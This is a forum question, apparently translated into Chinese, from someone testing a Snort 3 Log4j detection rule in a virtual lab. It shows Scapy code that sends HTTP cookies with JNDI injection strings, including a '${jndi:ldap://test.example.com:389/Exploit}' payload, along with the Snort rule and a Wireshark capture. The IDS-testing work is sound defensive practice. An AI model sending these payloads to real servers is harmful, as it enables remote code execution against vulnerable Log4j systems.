使用 Scapy 正确设置 HTTP 请求的 cookie

我正在尝试使用 Python Scapy 2.5 库触发 Snort 3 IDS 规则。该规则期望看到特定的 HTTP cookie 值。在测试请求时，HTTP 请求被发送到 Snort 位于前面的 HTTP 侦听器。我收到来自侦听器的 200 响应，但未触发规则。这是在虚拟实验室环境中进行的。

这是生成请求的 Python 代码，您可以在其中看到我尝试了几个值来尝试匹配规则正则表达式：

import logging
import socket
from scapy.all import *
from scapy.layers.http import HTTPRequest

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

target_ip = "192.168.208.167"
target_port = 80

# The cookie value to trigger the Snort rule with sid 58726 and rev 6
cookie_name = "jndi"
cookie_value = f"%24%7Bjndi%3A"
#cookie_value = "${jndi:"
#cookie_value = f'test%24%7Bjndi%3Aldap%3A//test.example.com%3A389/Exploit%7D'
#cookie_value = "%24%7Bjndi%3Aldap%3A%2F%2Ftest.example.com%3A389%2FExploit%7D"

def send_request(cookie_name, cookie_value):
    http_request = HTTPRequest(
        Method=b"GET",
        Path=b"/",
        Host=bytes(target_ip, encoding="utf-8"),
        User_Agent=b"Mozilla/5.0",
        Accept=b"*/*",
        Connection=b"keep-alive",
        Cookie=f"{cookie_name}={cookie_value}"
    )

    http_request_raw = raw(http_request)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))

    sock.sendall(http_request_raw)
    response = sock.recv(4096)

    sock.close()
    print(response)
    print("Triggered Snort rule with sid: 58726, rev: 6")

send_request(cookie_name, cookie_value)

这是 Snort 规则：

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-OTHER Apache Log4j logging remote code execution attempt"; flow:to_server,established; content:"jndi",fast_pattern,nocase; http_cookie; content:"jndi",nocase; pcre:"/(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)/i"; metadata:policy balanced-ips drop,policy connectivity-ips drop,policy max-detect-ips drop,policy security-ips drop,ruleset community; service:http; reference:cve,2021-44228; reference:cve,2021-44832; reference:cve,2021-45046; reference:cve,2021-45105; classtype:attempted-user; sid:58726; rev:6; )

这是每个 WireShark 的 HTTP 流：

GET / HTTP/1.1
Accept: */*
Connection: keep-alive
Cookie: jndi=%24%7Bjndi%3A
Host: 192.168.208.167
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Date: Tue, 09 May 2023 14:03:44 GMT
Content-Type: text/html
Content-Length: 258
Connection: Close
Server: INetSim HTTP Server

<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>

思考为什么请求没有触发 Snort 规则？